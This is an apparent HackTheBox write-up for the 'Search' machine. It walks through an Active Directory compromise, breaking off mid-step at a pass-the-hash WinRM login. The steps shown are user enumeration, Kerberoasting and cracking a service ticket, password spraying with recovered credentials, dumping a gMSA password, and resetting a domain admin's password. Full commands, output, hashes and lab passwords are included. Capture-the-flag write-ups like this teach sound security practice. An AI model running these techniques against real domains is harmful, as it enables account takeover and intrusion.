Search is a hard rated machine on HackTheBox created by dmw0ng. For the user part we will abuse a password being publicy posted in an image. This leads us to discovering of an account with SPN set whose password is weak. This password was reused by another user who also has an excel sheet containing more credentials pairs stored. One of those credentials work giving us access as Sierra and the user flag. As Sierra we crack a password protected certificate which gives us access to a PowerShell Web Console. There we will dump the gMSA password of another account which has GenericAll rights over a domain admin leading to full compromise.
User
Nmap
As usual we start our enumeration with a nmap scan against all ports followed by a script and version detection scan against the open ones to get an initial overview of the attack surface.
All ports
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ sudo nmap -p- -T4 10.129.96.123
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 21:18 UTC
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.061s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8172/tcp open unknown
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49691/tcp open unknown
49706/tcp open unknown
49715/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 281.02 seconds
Script and version
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
$ sudo nmap -p53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,8172,9389,49667,49677,49678,49691,49706,49715 -sC -sV 10.129.96.123
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 21:24 UTC
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.030s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-18 21:24:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-18T21:26:20+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_http-title: Search — Just Testing IIS
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2021-12-18T21:26:20+00:00; +1s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
445tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2021-12-18T21:26:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-18T21:26:20+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2021-12-18T21:26:20+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_ssl-date: 2021-12-18T21:26:20+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2021-12-18T21:25:41
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.47 seconds
Posted Password
The scan shows we are dealing with a domain controller. Furthermore the open web ports look interesting so we will start there. Opening it in our browser we see the homepage of Search research.
Scrolling a bit further down we can find a few people that might also have an account in AD.
To test for this we take their names and perform 3 common mutations on them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
KeelyLyons
Keely.Lyons
K.Lyons
DaxSantiago
Dax.Santiago
D.Santiago
SierraFrye
Sierra.Frye
S.Frye
KylaStewart
Kyla.Stewart
K.Stewart
KaiaraSpencer
Kaiara.Spencer
K.Spencer
DaveSimpson
Dave.Simpson
D.Simpson
BenThompson
Ben.Thompson
B.Thompson
ChrisStewart
Using kerbrute we can now check which usernames exist on the machine by requesting a TGT. This reveals the naming scheme of the company firstname.lastname.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ./kerbrute userenum -d search.htb --dc search.htb users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/18/21 - Ronnie Flathers @ropnop
2021/12/18 21:34:25 > Using KDC(s):
2021/12/18 21:34:25 > search.htb:88
2021/12/18 21:34:25 > [+] VALID USERNAME: Dax.Santiago@search.htb
2021/12/18 21:34:25 > [+] VALID USERNAME: Keely.Lyons@search.htb
2021/12/18 21:34:25 > [+] VALID USERNAME: Sierra.Frye@search.htb
2021/12/18 21:34:25 > Done! Tested 22 usernames (3 valid) in 0.092 seconds
This does however not get us onto the machine yet, so we go looking for more information on the web page. There we find a picture with a notepad on it.
Taking a closer look at the notpad we see a username an a password.
Testing this set of credentials using the earlier identified naming scheme using cme we are able to authenticate to AD and list shares on the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ crackmapexec smb search.htb -d search.htb -u hope.sharp -p 'IsolationIsKey?' --shares
SMB 10.129.96.123 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.123 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
SMB 10.129.96.123 445 RESEARCH [+] Enumerated shares
SMB 10.129.96.123 445 RESEARCH Share Permissions Remark
SMB 10.129.96.123 445 RESEARCH ----- ----------- ------
SMB 10.129.96.123 445 RESEARCH ADMIN$ Remote Admin
SMB 10.129.96.123 445 RESEARCH C$ Default share
SMB 10.129.96.123 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.129.96.123 445 RESEARCH helpdesk
SMB 10.129.96.123 445 RESEARCH IPC$ READ Remote IPC
SMB 10.129.96.123 445 RESEARCH NETLOGON READ Logon server share
SMB 10.129.96.123 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.129.96.123 445 RESEARCH SYSVOL READ Logon server share
SPN crackable
Since we are not being hunted and we got user credentials we can get a quick overview using bloodhound-python to dump active directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ bloodhound-python -d search.htb -u hope.sharp -c All -p 'IsolationIsKey?' -ns 10.129.96.123
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Windows-100.search.htb
INFO: Querying computer: Windows-99.search.htb
INFO: Querying computer: Windows-98.search.htb
INFO: Querying computer: Windows-97.search.htb
...[snip]...
Checking the common queries we see that web_svc has a SPN set.
Retrieving the ticket hash using impacketโs GetUserSPNs.py it cracks rather quickly.
1
2
3
4
5
6
7
8
9
10
$ GetUserSPNs.py 'search.htb/hope.sharp:IsolationIsKey?' -request-user web_svc
Impacket v0.9.23.dev1+20210111.162220.7100210f - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 12:59:11.329031 <never>
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$6439d530db7eae800b6194aaf69e014c$bbe33da63283cecea993b96954a893c7990bf6d381f19f53270f7e4850142844e6627a3edc176ab8b631cfa65501ea8c4e5af4ec76a88424c15d3e938b5195061bad5b2dbd26662d870cee45ff1617feb39adcd443b8e692d1af970e0f7c02b338a6d7bb219d72e21aefa4ae8ff130d06999dc66d59cd91d8caefd2863c40b1ea7d7df52a6b1cea9f6b562f8da2c1473f09afdae96c151f2c16a3dd0b2f69b4e6d4ff716bcf32461da508c054676f9124ca20877223c2f2ba4daa8907bfb60af4716c84df7bf5579894705f2760dfa602a3e76443ac9b2d786035e5e46b0f5695b0170e6e0a398a1bd93f8dd3f7aeeda70aad1617b6bf495739aae2bd501596c1e742cb64495d7f98a0cee510556191645e22a0f9e341939727d24cf1b28446438766d2dceb0c745cb19b0228b85ea959d764bb4dde82fed0c99af8178d8394c9fe66d3dae034ae52d899f7520fd5846bcbc1bddea10d1651154aa9c66adefc0249b72f7d1d3fb43c8075127ed8d7e8a42631e85f6f8d4dd1ba13ce6f68d30d44a6a5983a1de2efee4985390ce2765c27ff4106cae1dc244c1a95ff430eff6ff647d84b75ce7ec7bd3d8cefaaf09028022992e317a05787a0121813db1e27f81955ba41154c22390a2b028e1c2be20993898238d7c1b529dab499852cdd6cd764b2418db2b55c919af83bc5b5867de774549af2e5f1e67d92a170a74a9e67ba182ba0c82507982fad13890e3b58664e7a6230b937af52d27fc070bd52492152ab15f148a8df68138c8af41738e5ae39f0282f0bc76cde4a65ff2dea083cdc04b52888f3e825f2d99d957a0e264cfcbf845caf898295db8df5d3af0856418fa267535894a71c7fc3b3945e6ab2e71e6e18a4c56ce2e1fb8c2818f57724bfe6c7cb0e6ce274858df5ee9ee37e8ce8ada72674641203322acf5a5e7f9881a9ca83f7a291236e390957c6e50cb576e5f1c649db5da14b83a11b09bad768311b4c41c3e603bb554a3bf0ec7ef20d1485f87235bc251fe2f93422ef9409cabafc629ed7628970c63046e4338f20cace2d949682e76b8d8de8d7fbd39e421853feda625651c61d739a24091d12c1cb16bf491bcee60dcad7edc700d6e949b542617e67ab4a766517bd6d0acf250d387a8fb17d626c13b186085a5423eb0b40d1c92d28c76d65560d6acf973c1439aa454603f8509307ebef9341809c957de081d8cac74a7202ea891f7e7252310f07ca64a852f6c6a714536d5bda1a0d302e9aef03e61f60fba92224d63326da2cce288be8cee8858b9912a5f5b969497fe37ba0560c2338499343b0c638db1b8db60fb70ac9d97e43c93afd46c99a4cd60bada8310cf222b5a86f78e7c6228bf1a0ac1387d96bce931c6128ffd40a31f1422cecf99eddc2f3d6715a9b2fa8047c38e25f403aa89c521f4f9c04914b89081ffdf9b4b59db0b6b05494efb04495b47e0e12461a94a18a96013
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ hashcat -m 13100 -O -a 0 hash rockyou.txt
hashcat (v6.2.5) starting
...[snip]...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$6439d530db7eae800b6194aaf69e014c$bbe33da63283cecea993b96954a893c7990bf6d381f19f53270f7e4850142844e6627a3edc176ab8b631cfa65501ea8c4e5af4ec76a88424c15d3e938b5195061bad5b2dbd26662d870cee45ff1617feb39adcd443b8e692d1af970e0f7c02b338a6d7bb219d72e21aefa4ae8ff130d06999dc66d59cd91d8caefd2863c40b1ea7d7df52a6b1cea9f6b562f8da2c1473f09afdae96c151f2c16a3dd0b2f69b4e6d4ff716bcf32461da508c054676f9124ca20877223c2f2ba4daa8907bfb60af4716c84df7bf5579894705f2760dfa602a3e76443ac9b2d786035e5e46b0f5695b0170e6e0a398a1bd93f8dd3f7aeeda70aad1617b6bf495739aae2bd501596c1e742cb64495d7f98a0cee510556191645e22a0f9e341939727d24cf1b28446438766d2dceb0c745cb19b0228b85ea959d764bb4dde82fed0c99af8178d8394c9fe66d3dae034ae52d899f7520fd5846bcbc1bddea10d1651154aa9c66adefc0249b72f7d1d3fb43c8075127ed8d7e8a42631e85f6f8d4dd1ba13ce6f68d30d44a6a5983a1de2efee4985390ce2765c27ff4106cae1dc244c1a95ff430eff6ff647d84b75ce7ec7bd3d8cefaaf09028022992e317a05787a0121813db1e27f81955ba41154c22390a2b028e1c2be20993898238d7c1b529dab499852cdd6cd764b2418db2b55c919af83bc5b5867de774549af2e5f1e67d92a170a74a9e67ba182ba0c82507982fad13890e3b58664e7a6230b937af52d27fc070bd52492152ab15f148a8df68138c8af41738e5ae39f0282f0bc76cde4a65ff2dea083cdc04b52888f3e825f2d99d957a0e264cfcbf845caf898295db8df5d3af0856418fa267535894a71c7fc3b3945e6ab2e71e6e18a4c56ce2e1fb8c2818f57724bfe6c7cb0e6ce274858df5ee9ee37e8ce8ada72674641203322acf5a5e7f9881a9ca83f7a291236e390957c6e50cb576e5f1c649db5da14b83a11b09bad768311b4c41c3e603bb554a3bf0ec7ef20d1485f87235bc251fe2f93422ef9409cabafc629ed7628970c63046e4338f20cace2d949682e76b8d8de8d7fbd39e421853feda625651c61d739a24091d12c1cb16bf491bcee60dcad7edc700d6e949b542617e67ab4a766517bd6d0acf250d387a8fb17d626c13b186085a5423eb0b40d1c92d28c76d65560d6acf973c1439aa454603f8509307ebef9341809c957de081d8cac74a7202ea891f7e7252310f07ca64a852f6c6a714536d5bda1a0d302e9aef03e61f60fba92224d63326da2cce288be8cee8858b9912a5f5b969497fe37ba0560c2338499343b0c638db1b8db60fb70ac9d97e43c93afd46c99a4cd60bada8310cf222b5a86f78e7c6228bf1a0ac1387d96bce931c6128ffd40a31f1422cecf99eddc2f3d6715a9b2fa8047c38e25f403aa89c521f4f9c04914b89081ffdf9b4b59db0b6b05494efb04495b47e0e12461a94a18a96013:@3ONEmillionbaby
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*...a96013
Time.Started.....: Sat Dec 18 23:01:39 2021 (1 sec)
Time.Estimated...: Sat Dec 18 23:01:40 2021 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10791.5 kH/s (2.62ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 11799265/14344388 (82.26%)
Rejected.........: 2785/11799265 (0.02%)
Restore.Point....: 11470993/14344388 (79.97%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: AH040474 -> 8186dda
Hardware.Mon.#1..: Temp: 44c Fan: 33% Util: 31% Core:1809MHz Mem:4006MHz Bus:16
Started: Sat Dec 18 23:01:26 2021
Stopped: Sat Dec 18 23:01:41 2021
Password reuse
There is another interesting thing about web_svc, which is the account description. It mentions the account is a Temp Account created by HelpDesk.
If we are lucky this might mean that the password is reused from a member of the HelpDesk group. We can get all the recursive group members using bloodhound.
Running cme against the list of usernames we can see that EDGAR.JACOBS probably reused his account password to create web_svc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ crackmapexec smb search.htb -u helpdesk -p '@3ONEmillionbaby' --shares
SMB 10.129.96.123 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.123 445 RESEARCH [-] search.htb\CHANEL.BELL:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\LANE.WU:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\KEITH.HESTER:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\ISABELA.ESTRADA:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [+] search.htb\EDGAR.JACOBS:@3ONEmillionbaby
SMB 10.129.96.123 445 RESEARCH [+] Enumerated shares
SMB 10.129.96.123 445 RESEARCH Share Permissions Remark
SMB 10.129.96.123 445 RESEARCH ----- ----------- ------
SMB 10.129.96.123 445 RESEARCH ADMIN$ Remote Admin
SMB 10.129.96.123 445 RESEARCH C$ Default share
SMB 10.129.96.123 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.129.96.123 445 RESEARCH helpdesk READ
SMB 10.129.96.123 445 RESEARCH IPC$ READ Remote IPC
SMB 10.129.96.123 445 RESEARCH NETLOGON READ Logon server share
SMB 10.129.96.123 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.129.96.123 445 RESEARCH SYSVOL READ Logon server shar
Checking the users home directory which is in the RedirectedFolders$ smb share we find an interesting looking excel file Phishing_Attempt.xlsx.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ smbclient.py 'search.htb/EDGAR.JACOBS:@3ONEmillionbaby'@search.htb
Impacket v0.9.23.dev1+20210111.162220.7100210f - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
helpdesk
IPC$
NETLOGON
RedirectedFolders$
SYSVOL
# use RedirectedFolders$
# ls
drw-rw-rw- 0 Sat Dec 18 22:06:19 2021 .
drw-rw-rw- 0 Sat Dec 18 22:06:19 2021 ..
drw-rw-rw- 0 Tue Apr 7 18:12:58 2020 abril.suarez
drw-rw-rw- 0 Fri Jul 31 13:11:32 2020 Angie.Duffy
drw-rw-rw- 0 Fri Jul 31 12:35:32 2020 Antony.Russo
drw-rw-rw- 0 Tue Apr 7 18:32:31 2020 belen.compton
drw-rw-rw- 0 Fri Jul 31 12:37:36 2020 Cameron.Melendez
drw-rw-rw- 0 Tue Apr 7 18:15:09 2020 chanel.bell
drw-rw-rw- 0 Fri Jul 31 13:09:07 2020 Claudia.Pugh
drw-rw-rw- 0 Fri Jul 31 12:02:04 2020 Cortez.Hickman
drw-rw-rw- 0 Tue Apr 7 18:20:08 2020 dax.santiago
drw-rw-rw- 0 Fri Jul 31 11:55:34 2020 Eddie.Stevens
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 edgar.jacobs
drw-rw-rw- 0 Fri Jul 31 12:39:50 2020 Edith.Walls
drw-rw-rw- 0 Tue Apr 7 18:23:13 2020 eve.galvan
drw-rw-rw- 0 Tue Apr 7 18:29:22 2020 frederick.cuevas
drw-rw-rw- 0 Thu Apr 9 14:34:41 2020 hope.sharp
drw-rw-rw- 0 Tue Apr 7 18:07:00 2020 jayla.roberts
drw-rw-rw- 0 Fri Jul 31 13:01:06 2020 Jordan.Gregory
drw-rw-rw- 0 Thu Apr 9 20:11:39 2020 payton.harmon
drw-rw-rw- 0 Fri Jul 31 11:44:32 2020 Reginald.Morton
drw-rw-rw- 0 Tue Apr 7 18:10:25 2020 santino.benjamin
drw-rw-rw- 0 Fri Jul 31 12:21:42 2020 Savanah.Velazquez
drw-rw-rw- 0 Thu Nov 18 01:01:45 2021 sierra.frye
drw-rw-rw- 0 Thu Apr 9 20:14:26 2020 trace.ryan
# cd edgar.jacobs
# ls
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 .
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 ..
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 Desktop
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Documents
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Downloads
# cd Desktop
# ls
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 .
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 ..
drw-rw-rw- 0 Thu Apr 9 20:05:29 2020 $RECYCLE.BIN
-rw-rw-rw- 282 Mon Aug 10 10:02:16 2020 desktop.ini
-rw-rw-rw- 1450 Thu Apr 9 20:05:03 2020 Microsoft Edge.lnk
-rw-rw-rw- 23130 Mon Aug 10 10:30:05 2020 Phishing_Attempt.xlsx
# get Phishing_Attempt.xlsx
Opening it the column C is missing.
Copying everything with CTRL + A => CTRL + C and pasting it into a new file we see the hidden column contained the password fo the usernames.
creds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
To find out which combination is valid we put the usernames and password and in seperate lists and use them with cme against smb.
1
2
$ cat creds | awk -F' ' '{print $3}' > passwords
$ cat creds | awk -F' ' '{print $4}' > users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ crackmapexec smb search.htb -u users -p passwords -d search.htb --continue-on-success --no-bruteforce
SMB 10.129.96.123 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Username:password STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Cortez.Hickman:..10-time-TALK-proud-66.. STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Bobby.Wolf:??47^before^WORLD^surprise^91?? STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83// STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++ STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Eliezer.Jordan:!!05_goes_SEVEN_offer_83!! STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Hunter.Kirby:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Annabelle.Wells:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Eve.Galvan://61!banker!FANCY!measure!25// STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Jeramiah.Fritz:??40:student:MAYOR:been:66?? STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&& STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Joy.Costa:**30*venus*BALL*office*42** STATUS_LOGON_FAILURE
SMB 10.129.96.123 445 RESEARCH [-] search.htb\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE
This shows that the password for Sierra.Frye is valid. Checking her mounted home directory we are able to retrieve the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ smbclient.py 'search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.23.dev1+20210111.162220.7100210f - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# cd sierra.frye
# cd desktop
# ls
drw-rw-rw- 0 Thu Nov 18 01:08:17 2021 .
drw-rw-rw- 0 Thu Nov 18 01:08:17 2021 ..
drw-rw-rw- 0 Thu Nov 18 01:08:17 2021 $RECYCLE.BIN
-rw-rw-rw- 282 Thu Nov 18 01:08:17 2021 desktop.ini
-rw-rw-rw- 1450 Thu Nov 18 01:08:17 2021 Microsoft Edge.lnk
-rw-rw-rw- 34 Sat Dec 18 19:01:45 2021 user.txt
# get user.txt
1
2
$ wc -c user.txt
34 user.txt
Root
To domain admin we will go over multiple ways with the first two of them probably being patched by now.
All the ways involve reading the gMSA password of BIR-ADFS-GMSA$ first as sierra.frye. This user has in turn GenericAll over Tristan.Davies who is in the EA/DA/A groups.
RSAT
One way to abuse this using the RSAT toolset on a windows machine. First we add the DNS entry for search.htb to our C:\Windows\System32\drivers\etc\hosts file.
Now we can create a netlogon sessions for sierra using runas.
1
2
3
PS C:\Tools\PowerSploit\Recon > runas /netonly /user:search.htb\sierra.frye powershell
Enter the password for search.htb\sierra.frye:
Attempting to start powershell as user "search.htb\sierra.frye" ...
In this spawned powershell windows we are able to read the gMSA password for BIR-ADFS-GMSA$, impersonate the account and change the password for the user Tristan.Davies.
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\Windows\system32 > $gmsa = Get-ADServiceAccount -Server 10.129.96.123 -Identity BIR-ADFS-GMSA -Properties 'msds-ManagedPassword'
COMMANDO 12/19/2021 12:19:05 AM
PS C:\Windows\system32 > $pass = ConvertTo-SecureString -AsPlainText -Force ((ConvertFrom-ADManagedPasswordBlob($gmsa.'msds-ManagedPassword')).'CurrentPassword')
COMMANDO 12/19/2021 12:20:04 AM
PS C:\Windows\system32 > $user = 'BIR-ADFS-GMSA$'
COMMANDO 12/19/2021 12:20:13 AM
PS C:\Windows\system32 > $cred = New-Object System.Management.Automation.PSCredential($user,$pass)
COMMANDO 12/19/2021 12:20:18 AM
PS C:\Windows\system32 > $newpass = ConvertTo-SecureString -AsPlainText -force 'Pa%%w.rD!!'
COMMANDO 12/19/2021 12:21:25 AM
PS C:\Windows\system32 > Set-ADAccountPassword -Identity Tristan.Davies -reset -NewPassword $newpass -Credential $cred -Server 10.129.96.123
COMMANDO 12/19/2021 12:22:14 AM
Now we can spawn another powershell window with runas as tristan.
1
2
3
PS C:\Tools\PowerSploit\Recon > runas /netonly /user:search.htb\tristan.davies powershell
Enter the password for search.htb\tristan.davies:
Attempting to start powershell as user "search.htb\tristan.davies" ...
In this console we can just psexec onto the machine and read the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Tools\Sysinternals > .\PsExec.exe \\search.htb powershell.exe
PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> cat \users\administrator\desktop\root.txt | measure -c
a uesamnsrtrdstpro.x esr c
Lines Words Characters Property
----- ----- ---------- --------
32
Winrm
Another way to dump the gMSA password remotly is gMSADumper.
1
2
3
4
$ python3 gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
This tool returns the rc4 hash of BIR-ADFS-GMSA$. This hash in turn can be used to PTH over WINRM. Now you could just quickly change the password for tristan.davies.
1
2
3
4
5
6
7
8
$ evil-winrm -i search.htb -u BIR-ADFS-GMSA$ -H e1e9fd9e46d0d747e1595167eedcec0f
Evil-WinRM shell v2.4
